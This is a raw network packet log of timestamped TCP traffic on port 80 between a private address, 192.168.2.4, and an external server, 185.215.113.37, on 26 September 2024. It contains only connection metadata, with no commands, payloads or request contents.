Sep 26, 2024 22:40:15.419573069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.419588089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.419600964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.419605017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.419630051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.419657946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.464675903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.464696884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.464715958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.464739084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.464778900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547003984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547087908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547121048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547136068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547163963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547171116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547182083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547199965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547246933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547247887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547262907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547280073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547308922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547312975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547324896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547334909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547341108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547355890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547373056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547377110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547416925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547455072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547503948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547621012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547637939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547688961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547705889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547725916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547763109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547791004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547802925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547807932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547823906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547840118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.547852993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.547892094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.548074007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548089981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548106909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548127890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.548167944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.548203945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548219919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548235893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548255920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.548290968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.548791885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548830032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548846960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548865080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.548903942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.548923969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548950911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548966885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.548969984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.548984051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549000978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549009085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549036026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549052954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549096107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549170971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549186945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549201965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549216032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549242973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549266100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549535036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549562931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549580097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549612045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549654007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549670935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549686909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549702883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549731016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549746990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549766064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549792051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549832106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.549984932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.549999952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550018072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550044060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550062895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550331116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550345898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550363064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550379038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550384998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550394058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550410032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550426960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550434113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550450087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550466061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550468922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550493956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550506115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550523043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550523996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550563097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550582886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550587893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550600052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550616980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550632954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550652027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550659895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550676107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550687075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550693989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550708055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550745010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550832987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550848007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550870895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550888062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550894022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550903082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.550915003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.550952911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.551928043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.551987886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552000999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552016020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552040100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552047968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552057028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552072048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552072048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552094936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552100897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552117109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552129984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552134037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552172899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552176952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552192926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552207947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552210093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552238941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552242994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552254915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552278996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552278996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552295923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552305937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552321911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552339077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552342892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552354097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552371979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552378893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552402020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552442074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552798986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552851915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552867889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552896976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552901983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552912951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552927971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552947044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552958012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552973032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.552975893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.552993059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.553003073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.553039074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.593944073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.593965054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.593983889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.594002008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.594017982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.594037056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.594088078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.594165087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.676378012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676412106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676429033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676445961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676462889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676481009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676496983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676516056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676651001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.676724911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.676820993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676847935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676865101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676872969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.676881075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676898003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676914930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.676914930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.676950932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.676983118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677372932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677419901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677434921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677438974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677450895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677465916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677493095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677521944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677716017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677731037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677757978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677772045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677774906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677791119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677791119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677808046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.677812099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677836895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.677879095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.678265095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.678281069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.678307056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.678323984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.678337097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.678342104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.678380966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.678410053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.679826975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.679842949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.679860115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.679917097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.679925919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.679941893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.679955006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.679959059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.679975033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.679995060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.680000067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.680031061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.680052042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.680819035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.680835009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.680850983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.680875063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.680905104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.680915117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.680932045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.680985928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681363106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681399107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681411982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681420088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681447983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681448936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681467056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681471109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681507111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681531906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681646109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681663036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681679010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681701899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681701899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681718111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681736946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681745052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681766033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681793928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681854963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681926966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681941032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.681987047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.681993008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682009935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682023048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.682038069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682053089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682060957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.682070017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682099104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.682137966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.682777882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682792902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682821035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682836056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682852030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682862043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.682869911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682883024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.682908058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.682949066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682960987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.682965994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682981968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.682996988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683013916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683017969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683032036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683048010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683063984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683065891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683089972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683103085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683140039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683176994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683207989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683223963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683239937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683254957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683263063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683271885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683281898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683314085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683316946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683330059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683346987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683351994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683408976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683418989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683418989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683427095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683456898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:15.683461905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:15.683474064 CEST	80	49730	185.215.113.37	192.168.2.4
